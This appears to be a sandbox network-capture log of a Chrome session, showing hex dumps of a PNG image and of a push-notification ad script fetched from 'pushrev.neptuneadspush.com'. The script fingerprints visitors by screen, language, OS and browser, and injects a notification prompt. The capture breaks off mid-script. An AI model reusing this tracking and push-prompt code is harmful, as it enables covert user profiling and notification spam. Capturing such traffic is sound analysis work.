                                                          2023-11-27 03:23:52 UTC668INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 06 00 00 00 79 7d 8e 75 00 00 00 01 73 52 47 42 01 d9 c9 2c 7f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 8c 63 49 44 41 54 78 9c ec bd 09 98 15 d5 b5 f6 9f ff f7 dd 38 e1 18 63 d4 ab 44 c1 38 44 44 0d 11 01 c5 1b 05 fc cb 15 65 bc 7a a3 0c f1 22 82 c6 28 83 1a 15 71 16 e7 38 c5 79 8a f3 10 35 1a 15 e7 31 8e a8 28 8a 03 ce b3 a8 71 8c 89 9a ab b1 be fd 5b 7b af 5d bb ea 54 d5 a9 d3 03 a7 81 5a cf 53 4f 37 4d f7 e9 3a d5 b5 df 5a 6b ed 77 bd ef f7 ae 5a eb e7 d1 22 7f fc 64 13 39 ae d6 63 ed 9e d1 d5 eb 70 f4 92 e3 8f eb f6 f6 87 fd 5a 4f fb 3d 1c ee 67 e5 68 f6 fb e8 c8 87 5e 5b 77 5d ff b8 5e ef e8 9a f5 fb 98 63 f3 e8 9a 6e 7d ed c1 e7 e6 6b fc 9f 5c e7
                                                          Data Ascii: PNGIHDR,,y}usRGB,pHYscIDATx8cD8DDez"(q8y51(q[{]TZSO7M:ZkwZ"d9cpZO=gh^[w]^cn}k\
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 96 5e d7 2a 83 5d a4 8e 41 cb fc 20 ba ac 4b 8f e3 bf 17 46 b3 4f 6a be 1e 41 bf 4a 9e f8 f4 52 a4 3c e9 2f c0 c3 13 7f c6 36 3b 08 30 dd b1 c3 d8 e8 ae 9d 77 8f ee 19 b3 67 74 ef ff ec 6d 8f 5d f6 8a ee 1e fd eb e8 ce 5f 8e 8f 6e 1f b6 8b 5d 5c 66 e1 fd 79 8b ed 04 ec e2 8c a0 8f 2d 11 17 d5 c5 95 2e b7 cd f5 a0 cc 26 23 15 b0 1a 30 42 ae f1 9d ff bd 5b f4 c5 3b ef 45 c4 37 5f 7e 15 3d 76 f8 09 d1 5d 3b 8d 8f 6e 1b 3a 26 9a 61 1e 0a 80 96 5c 57 1e 06 e6 6f b5 48 5f d3 45 e8 b8 d8 94 80 17 ac b9 51 b4 fb 8a ab 1f f7 bd 74 34 fb e4 e6 eb 91 c8 ac 36 b7 4f 7c 16 d1 66 83 24 63 ba 75 bb 91 d1 1d 3b 8e 8d ee 19 bd 67 74 df 6e 53 a2 27 8f ff 7d f4 d6 9d f7 47 9f bf f6 a6 1c 1f 3e f9 74 f4 da 8d b7 46 0f ef 7b 68 74 ef d8 89 02 68 64 05 64 5c 80 dd 0d bd 07 4a
                                                          Data Ascii: ^*]A KFOjAJR</6;0wgtm]_n]\fy-.&#0B[;E7_~=v];n:&a\WoH_EQt46O|f$cu;gtnS'}G>tF{hthdd\J
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 37 ca bd da c0 95 dd 00 d6 36 3b 48 8f f0 8b 77 e7 35 0e 58 93 2d 60 d9 0c b5 02 ac 85 e5 d8 ca 94 81 97 75 e9 d1 72 b0 5a a4 00 8b 0c cb dc f8 3c b1 6f db 7e 54 e1 2e 15 01 58 01 52 0f ec b9 bf 34 80 d9 b1 22 6b 7a 70 af 03 a3 47 f6 3f 42 40 ab 28 d3 02 d8 f8 5e 61 c2 ef 30 36 31 77 98 09 5c 1d 59 e9 21 0d 50 c1 e8 8d 0a 1c c6 44 d1 fe 16 b0 4c 49 48 0f 4a 1a ee f3 6a 7b 58 79 01 dd c1 f6 b0 26 ca c6 88 f4 b0 7a 55 3d ac 05 f9 a0 0c fc 7d e7 6e d1 11 ab ae 7d 40 ab c0 6a a1 01 ac ac 05 95 9e 67 73 94 06 d9 bd 82 d2 f0 df bb 45 73 2f bb 26 73 d1 cc 7b e4 71 d9 86 a7 79 2e c3 ce e6 7b d9 b1 62 fe 8d ac 81 45 f8 e8 d4 e9 85 a0 47 a6 f0 e8 81 47 09 f7 88 06 32 3f 2b 73 87 e6 77 a7 81 eb 5a 37 dc db 21 47 79 c2 eb 19 00 94 68 87 85 22 87 4e 8c 4f a4 79 36 73
                                                          Data Ascii: 76;Hw5X-`urZ<o~T.XR4"kzpG?B@(^a061w\Y!PDLIHJj{Xy&zU=}n}@jgsEs/&s{qy.{bEGG2?+swZ7!Gyh"NOy6s
                                                          2023-11-27 03:23:52 UTC1369INData Raw: b2 bc b6 db 2b d0 ea 70 47 9f 25 97 fd ee c2 2e 1b ed dd ae 60 d5 e1 01 2b 43 67 c9 6b b0 0f 88 b5 c1 e1 39 51 8e d4 93 35 46 a0 0f 09 18 9e f2 d2 f0 de 71 9c 2c 46 5e 4b 78 51 ce a5 85 df a3 86 a9 3e d3 70 19 d6 73 e7 5d 5a 7a c1 36 12 76 67 ec 0c bb 95 3f c4 6d e5 27 08 93 ed 4c 75 f0 24 db 3e 31 c9 d6 00 b9 72 d6 78 18 14 65 55 f5 de db 4b 57 5c 27 7d 3f ca 3b 32 2c 0e 00 10 e1 c4 86 40 6b af 0a b4 3a d2 41 19 78 92 29 03 4f ed bc fe 6f da 1d ac 3a 34 60 85 63 1f 61 89 a2 4a a1 90 12 47 ee 11 dd 3f 61 9f e8 ed bb ff d2 d0 02 fa e4 85 97 a2 47 f7 3f 52 32 1a 16 a3 80 16 9c 28 b2 2c 03 88 d7 3a cb 2e a5 48 00 62 52 1a f1 7b 87 fd 2a 7a e1 a2 2b 0b 5f 1f aa 03 0d 79 88 a5 cc 22 42 95 c8 92 52 49 07 8d 78 64 9a c9 66 00 0a 59 8c 9c 0f 59 56 3b f7 b2 c2 79
                                                          Data Ascii: +pG%.`+Cgk9Q5Fq,F^KxQ>ps]Zz6vg?m'Lu$>1rxeUKW\'}?;2,@k:Ax)Oo:4`caJG?aG?R2(,:.HbR{*z+_y"BRIxdfYYV;y
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 8c 32 99 d6 73 e7 5f 5a d3 7f e4 fd d8 07 4d 1f 7b dd d6 b3 0a af 0b 8d 3c f5 7c 3a 4c 19 f8 2f 93 61 8d 6d 36 56 49 34 fb 62 64 02 56 c0 bd 92 2d f6 2d 6d ff 8a 27 6e bd 50 59 63 32 19 64 8a d9 79 62 0b 5d 81 a2 de 8d 4f b9 49 e9 26 60 21 25 c6 b6 c9 9d a7 1c bd ad 1a 21 3b c7 c6 97 b1 16 68 18 a6 d4 94 c5 67 ce ad 9e eb 31 c0 9a 38 07 34 b3 36 19 10 33 f0 bb 85 0b b1 77 c2 d8 22 17 a0 52 0a a1 89 63 bd 58 31 54 45 0e a5 87 65 ce 19 32 6b 5e 90 bd b6 14 ac 5e b9 ee 66 e9 e9 89 d4 8e 01 27 cd b0 34 cb a2 3c a4 af 45 43 5e 32 ad 69 47 e7 8a 00 c2 8b 0b 39 59 3c 28 64 62 c1 80 96 1c ee 41 22 fd c8 ee 5b 38 20 4b ca 53 57 a0 55 7b 9c f5 63 29 03 ff 75 71 97 8d ff a7 d9 38 e5 a3 d9 17 25 04 aa 70 c8 39 01 58 92 61 21 6b 5c 4c d8 a4 04 b4 2a 9f 53 ed f0 2d 83
                                                          Data Ascii: 2s_ZM{<|:L/am6VI4bdV--m'nPYc2dyb]OI&`!%!;hg18463w"RcX1TEe2k^^f'4<EC^2iG9Y<(dbA"[8 KSWU{c)uq8%p9Xa!k\L*S-
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 63 fe 81 95 73 5d 71 a5 9e cf 9e 78 2a 92 c2 bb d2 6d 86 96 3c 5a 06 b9 7f f3 c4 d4 27 bf 58 6e ed bc bb 6c fd eb 02 7e f6 bc 4b 12 4f 4d 9f ea 3b c2 67 e8 48 2c 24 4e b3 f8 d1 ce ca 0b 74 9c 84 93 a5 e4 cd de b1 d4 8b ee 16 86 bd 2b 2d 5d 29 ff 5a a2 97 45 b9 48 d6 67 65 6f c6 c6 60 35 c4 82 15 40 96 06 40 b2 4a b1 22 33 00 24 e5 63 aa df 65 b3 8d 11 5e 33 0c 50 e2 3a bd fb c0 a3 32 1f 88 5e 18 07 63 4e 7e 0e 92 46 38 a3 32 00 99 f9 28 9b 15 06 dc 39 b7 f4 e2 2f 13 4a 7d b0 d9 d5 be 16 1c 01 2b 51 2c dd cf 95 e7 b7 e4 fe fc 2b d7 de e8 45 fb b4 8c f3 8d 73 32 71 97 91 c7 1b 1d 71 39 9e 77 be d0 29 68 e2 93 ad cb 1c a2 4c 36 2c ba a0 75 86 29 03 0f 59 75 ad 6f 2f eb d2 63 e7 66 e3 51 dd 68 6f c0 4a cb 1a 2b 3f 29 39 de 32 4a 16 9c 9d bf 1b 67 8f 1d ec 36
                                                          Data Ascii: cs]qx*m<Z'Xnl~KOM;gH,$Nt+-])ZEHgeo`5@@J"3$ce^3P:2^cN~F82(9/J}+Q,+Es2qq9w)hL6,u)Yuo/cfQhoJ+?)92Jg6
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 86 74 ce cd 80 58 c8 ba 16 b2 a3 c9 98 64 17 6c b4 a5 08 58 00 1b ef 4d 45 95 00 49 7f 09 a0 0a b3 2a 01 5a 04 03 bb 87 da 5b 03 7d 89 a3 2a ab 1f 16 b0 ce 35 d2 e0 d2 56 c1 eb a6 47 71 1a 01 ad b2 01 c0 90 19 ca 83 42 c7 a3 7a 66 68 82 65 f4 49 a5 a7 e8 89 c6 e3 04 f4 20 99 96 03 ad 9b ec 03 6a 94 db 3d 14 d0 72 3b ce cd 74 e3 6e a3 83 32 f0 80 95 bb fe af f9 7c c1 04 2b a2 cd 2f 4c 96 da 82 1b a6 25 f3 78 fe 82 cb db ec c6 e6 06 13 6e cf 2e 7b 79 76 7b 96 e5 7b d8 9c cd 6a bc e7 ed 7c 41 96 64 7e cd f2 87 ec 06 00 80 44 13 9b 05 55 43 5e 7d 62 76 b2 64 dd d1 29 10 a4 8d 5c 21 3c ea 88 88 92 3d bd 84 8d 65 fa 87 9b 14 d2 cc 27 63 30 40 c8 b9 94 21 a2 86 a0 d5 96 41 79 9e 06 2d 7a 5a 65 00 a1 6c 40 f0 4c 88 29 06 d2 c7 89 2c 27 9c 3d 4d b4 1f b6 f1 f4 06
                                                          Data Ascii: tXdlXMEI*Z[}*5VGqBzfheI j=r;tn2|+/L%xn.{yv{{j|Ad~DUC^}bvd)\!<=e'c0@!Ay-zZel@L),'=M
                                                          2023-11-27 03:23:52 UTC1369INData Raw: e0 66 4b 2e 3b a8 d9 d8 d2 2e d1 52 50 ca 3b ae 4e 03 16 0d 6e f3 54 12 85 84 dd f7 2b 2c 33 b4 11 cc 4e 1c 4f 66 38 56 6c 2f db 59 c3 49 52 6a d0 07 2b 53 aa 68 79 68 7b 5a e3 1d 41 73 b8 17 79 13 fb 2d f8 4d 66 b1 02 8e ad d5 7b 92 1b fb 03 3b c4 2c e4 c3 c1 a3 e3 72 b0 5e d3 38 23 ab 4a 68 86 05 16 63 a1 46 98 2c 3e 37 bb a8 ba 55 65 41 8b ef 23 73 55 de 91 70 c3 a0 5e 30 5e 84 8c 4f e0 a5 48 56 54 6f 51 bf 74 c5 9f ec 3c a3 50 4c 6c c6 c4 6b 51 be de e2 c8 b6 fe 60 38 3b 41 ef 18 14 2b 80 06 86 1f 99 d9 68 8d b6 5a cf 24 40 85 fa fa 6a 12 22 ea 20 c1 d0 3d 52 45 0a 5a 26 23 a4 ec ab 97 49 32 64 ce bd 94 34 6d cd 29 0d 9b 08 5c 94 81 26 bb fa cf 66 e3 4a bb 45 a3 20 95 2d 69 9c 3c c2 be 4b ba c1 fd c9 dc 7c 5a 83 36 83 c9 16 c4 9c c0 64 47 a2 e0 00 59
                                                          Data Ascii: fK.;.RP;NnT+,3NOf8Vl/YIRj+Shyh{ZAsy-Mf{;,r^8#JhcF,>7UeA#sUp^0^OHVToQt<PLlkQ`8;A+hZ$@j" =REZ&#I2d4m)\&fJE -i<K|Z6dGY
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 25 0d f4 0d 65 b4 01 65 69 2f 38 93 90 19 c1 e8 95 94 c0 3d 07 a4 68 19 6d 0f 5a a6 04 e4 f8 c7 26 4b 2c fd ff 37 1b 43 e6 6b 64 2e a0 b5 d3 3c 16 57 da 39 55 4d c9 72 86 ea 13 6d bc 55 26 70 ea 04 f1 76 f5 28 2f c7 92 06 19 7a 50 cf 9d 77 69 dd 45 f4 ea f5 33 24 2b f2 46 04 db 39 f9 5f 7d 2a ea eb 35 50 1e b2 f8 45 cf db b9 b1 a8 cb 30 bf 83 1b 3b 6f 46 30 0c df b3 6a 0d 58 a5 b2 2b 75 5d d6 11 1c ce 0b 70 fd e8 d9 17 72 cf e3 eb 4f 3f 17 97 1d ae 11 8b 55 32 2f e7 e7 a7 06 a4 62 f2 50 12 b4 28 0f 71 f9 11 df 40 f3 73 00 a2 50 4a 26 4d 93 92 ba 8c 78 df db 77 dd 2f 0f 04 51 59 50 b7 a1 0d 82 a1 e5 46 16 66 02 d0 33 c6 94 cc 03 47 06 d8 cd f9 be 6b 40 bc 28 30 a7 45 cb 5d a8 17 81 1b 8f 07 2e 95 a4 46 ae 3b d0 34 43 69 f5 ef ef 59 45 8e 6f be fa 2a 7a e2
                                                          Data Ascii: %eei/8=hmZ&K,7Ckd.<W9UMrmU&pv(/zPwiE3$+F9_}*5PE0;oF0jX+u]prO?U2/bP(q@sPJ&Mxw/QYPFf3Gk@(0E].F;4CiYEo*z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.549749172.64.100.64434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:52 UTC565OUTGET /javascripts/trackpush-v2-cm.js HTTP/1.1
                                                          Host: pushrev.neptuneadspush.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://sofa.thriveuniversehq.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2023-11-27 03:23:52 UTC755INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 32 36 37 38 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:52 GMTContent-Type: application/javascript; charset=utf-8Transfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Vary: Accept-EncodingCache-Control: max-age=2678400CF-Cache-Statu
                                                          2023-11-27 03:23:52 UTC614INData Raw: 37 32 33 64 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 54 52 4b 50 75 73 68 44 65 66 65 72 72 65 64 28 29 20 7b 0d 0a 20 20 20 20 74 68 69 73 2e 5f 64 6f 6e 65 20 3d 20 5b 5d 2c 20 74 68 69 73 2e 5f 66 61 69 6c 20 3d 20 5b 5d 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 65 74 55 72 6c 56 61 72 73 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 61 20 3d 20 7b 7d 3b 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 72 65 70 6c 61 63 65 28 2f 5b 3f 26 5d 2b 28 5b 5e 3d 26 5d 2b 29 3d 28 5b 5e 26 5d 2a 29 2f 67 69 2c 20 66 75 6e 63 74 69 6f 6e 28 62 2c 20 63 2c 20 64 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 61 5b 63 5d 20 3d 20 64 0d 0a 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 61 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69
                                                          Data Ascii: 723dfunction _TRKPushDeferred() { this._done = [], this._fail = []}function getUrlVars() { var a = {}; window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(b, c, d) { a[c] = d }); return a}functi
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 20 7b 0d 0a 20 20 20 20 76 61 72 20 61 20 3d 20 31 2c 0d 0a 20 20 20 20 20 20 20 20 62 20 3d 20 22 64 65 73 6b 74 6f 70 22 3b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 28 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f 70 7c 69 65 6d 6f 62 69 6c 65 7c 69 70 28 68 6f 6e 65 7c 6f 64 29 7c 69 72 69 73 7c 6b 69 6e 64 6c 65 7c 6c 67 65 20 7c 6d 61 65 6d 6f 7c 6d 69 64 70 7c 6d 6d 70 7c 6d 6f 62 69 6c 65 2e 2b 66 69 72 65 66 6f 78 7c 6e 65 74 66 72 6f 6e 74 7c 6f 70 65 72 61 20
                                                          Data Ascii: { var a = 1, b = "desktop"; return function(b) { (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 63 6b 7c 72 74 7c 73 65 29 7c 70 72 6f 78 7c 70 73 69 6f 7c 70 74 5c 2d 67 7c 71 61 5c 2d 61 7c 71 63 28 30 37 7c 31 32 7c 32 31 7c 33 32 7c 36 30 7c 5c 2d 5b 32 2d 37 5d 7c 69 5c 2d 29 7c 71 74 65 6b 7c 72 33 38 30 7c 72 36 30 30 7c 72 61 6b 73 7c 72 69 6d 39 7c 72 6f 28 76 65 7c 7a 6f 29 7c 73 35 35 5c 2f 7c 73 61 28 67 65 7c 6d 61 7c 6d 6d 7c 6d 73 7c 6e 79 7c 76 61 29 7c 73 63 28 30 31 7c 68 5c 2d 7c 6f 6f 7c 70 5c 2d 29 7c 73 64 6b 5c 2f 7c 73 65 28 63 28 5c 2d 7c 30 7c 31
                                                          Data Ascii: o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 7c 7c 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 4c 61 6e 67 75 61 67 65 3b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 61 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 54 52 4b 50 75 73 68 47 65 74 52 65 73 6f 6c 75 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 61 20 3d 20 22 22 3b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 73 63 72 65 65 6e 2e 77 69 64 74 68 20 26 26 20 28 77 69 64 74 68 20 3d 20 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3f 20 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3a 20 22 22 2c 20 68 65 69 67 68 74 20 3d 20 73 63 72 65 65 6e 2e 68 65 69 67 68 74 20 3f 20 73 63 72 65 65 6e 2e 68 65 69 67 68 74 20 3a 20 22 22 2c 20 61 20 2b 3d 20 22 22 20 2b 20 77 69 64 74 68 20 2b 20 22 20 78 20 22 20 2b 20 68 65 69 67 68 74 29 2c 20 61 0d 0a 7d 0d
                                                          Data Ascii: || navigator.userLanguage; return a}function _TRKPushGetResolution() { var a = ""; return screen.width && (width = screen.width ? screen.width : "", height = screen.height ? screen.height : "", a += "" + width + " x " + height), a}
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 29 29 2c 20 28 68 20 3d 20 64 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 29 20 21 3d 20 2d 31 20 26 26 20 28 64 20 3d 20 64 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 68 29 29 2c 20 28 68 20 3d 20 64 2e 69 6e 64 65 78 4f 66 28 22 20 22 29 29 20 21 3d 20 2d 31 20 26 26 20 28 64 20 3d 20 64 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 68 29 29 2c 20 28 68 20 3d 20 64 2e 69 6e 64 65 78 4f 66 28 22 29 22 29 29 20 21 3d 20 2d 31 20 26 26 20 28 64 20 3d 20 64 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 68 29 29 2c 20 65 20 3d 20 70 61 72 73 65 49 6e 74 28 22 22 20 2b 20 64 2c 20 31 30 29 2c 20 69 73 4e 61 4e 28 65 29 20 26 26 20 28 64 20 3d 20 22 22 20 2b 20 70 61 72 73 65 46 6c 6f 61 74 28 6e 61 76 69 67 61 74 6f 72 2e 61 70 70 56 65 72 73 69 6f 6e 29 2c 20 65 20 3d 20
                                                          Data Ascii: )), (h = d.indexOf(";")) != -1 && (d = d.substring(0, h)), (h = d.indexOf(" ")) != -1 && (d = d.substring(0, h)), (h = d.indexOf(")")) != -1 && (d = d.substring(0, h)), e = parseInt("" + d, 10), isNaN(e) && (d = "" + parseFloat(navigator.appVersion), e =
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 57 69 6e 39 38 29 2f 0d 0a 20 20 20 20 20 20 20 20 7d 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 3a 20 22 57 69 6e 64 6f 77 73 20 39 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 3a 20 2f 28 57 69 6e 64 6f 77 73 20 39 35 7c 57 69 6e 39 35 7c 57 69 6e 64 6f 77 73 5f 39 35 29 2f 0d 0a 20 20 20 20 20 20 20 20 7d 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 3a 20 22 57 69 6e 64 6f 77 73 20 4e 54 20 34 2e 30 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 3a 20 2f 28 57 69 6e 64 6f 77 73 20 4e 54 20 34 2e 30 7c 57 69 6e 4e 54 34 2e 30 7c 57 69 6e 4e 54 7c 57 69 6e 64 6f 77 73 20 4e 54 29 2f 0d 0a 20 20 20 20 20 20 20 20 7d 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 3a 20 22 57 69 6e 64 6f 77 73 20 43 45 22 2c 0d 0a 20
                                                          Data Ascii: Win98)/ }, { s: "Windows 95", r: /(Windows 95|Win95|Windows_95)/ }, { s: "Windows NT 4.0", r: /(Windows NT 4.0|WinNT4.0|WinNT|Windows NT)/ }, { s: "Windows CE",
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 61 6b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 67 20 3d 20 22 2d 22 3b 0d 0a 20 20 20 20 73 77 69 74 63 68 20 28 2f 57 69 6e 64 6f 77 73 2f 2e 74 65 73 74 28 63 29 20 26 26 20 28 67 20 3d 20 2f 57 69 6e 64 6f 77 73 20 28 2e 2a 29 2f 2e 65 78 65 63 28 63 29 5b 31 5d 2c 20 63 20 3d 20 22 57 69 6e 64 6f 77 73 22 29 2c 20 63 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 61 73 65 20 22 4d 61 63 20 4f 53 20 58 22 3a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 20 3d 20 2f 4d 61 63 20 4f 53 20 58 20 28 31 30 5b 5c 2e 5c 5f 5c 64 5d 2b 29 2f 2e 65 78 65 63 28 61 29 5b 31 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 20 63 61 73 65 20 22 41 6e 64 72 6f 69 64 22 3a 0d 0a 20 20 20
                                                          Data Ascii: ak } } var g = "-"; switch (/Windows/.test(c) && (g = /Windows (.*)/.exec(c)[1], c = "Windows"), c) { case "Mac OS X": g = /Mac OS X (10[\.\_\d]+)/.exec(a)[1]; break; case "Android":
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 55 73 65 72 20 68 61 73 20 70 72 65 76 69 6f 75 73 6c 79 20 61 63 63 65 70 74 65 64 20 70 72 6f 6d 70 74 22 29 2c 20 21 31 29 20 3a 20 62 20 3f 20 28 73 68 6f 77 44 65 62 75 67 20 26 26 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 5b 50 55 53 48 4e 4f 54 49 46 49 43 41 54 49 4f 4e 53 5d 20 2d 20 46 6f 72 63 65 20 43 75 73 74 6f 6d 20 53 65 74 22 29 2c 20 62 2e 70 72 6f 6d 70 74 49 64 20 3e 20 30 20 3f 20 28 73 68 6f 77 44 65 62 75 67 20 26 26 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 5b 50 55 53 48 4e 4f 54 49 46 49 43 41 54 49 4f 4e 53 5d 20 2d 20 4c 6f 61 64 69 6e 67 20 50 72 6f 6d 70 74 22 29 2c 20 5f 54 52 4b 50 75 73 68 4c 6f 61 64 50 72 6f 6d 70 74 28 62 2e 70 72 6f 6d 70 74 49 64 2c 20 62 2e 61 75 74 6f 5f 70 72 6f 6d 70 74 29 29 20 3a 20 31 20 3d 3d
                                                          Data Ascii: User has previously accepted prompt"), !1) : b ? (showDebug && console.log("[PUSHNOTIFICATIONS] - Force Custom Set"), b.promptId > 0 ? (showDebug && console.log("[PUSHNOTIFICATIONS] - Loading Prompt"), _TRKPushLoadPrompt(b.promptId, b.auto_prompt)) : 1 ==
                                                          2023-11-27 03:23:52 UTC1369INData Raw: 22 20 2b 20 61 29 3b 0d 0a 20 20 20 20 63 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 34 20 3d 3d 20 63 2e 72 65 61 64 79 53 74 61 74 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 6d 70 74 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 63 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 44 49 56 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 20 22 70 75 73 68 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 50 72 6f 6d 70 74 22 29 2c 20 61 2e 69 6e 6e 65 72 48
                                                          Data Ascii: " + a); c.onreadystatechange = function() { if (4 == c.readyState) { prompt = JSON.parse(c.responseText); var a = document.createElement("DIV"); a.setAttribute("id", "pushNotificationsPrompt"), a.innerH


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.549751104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
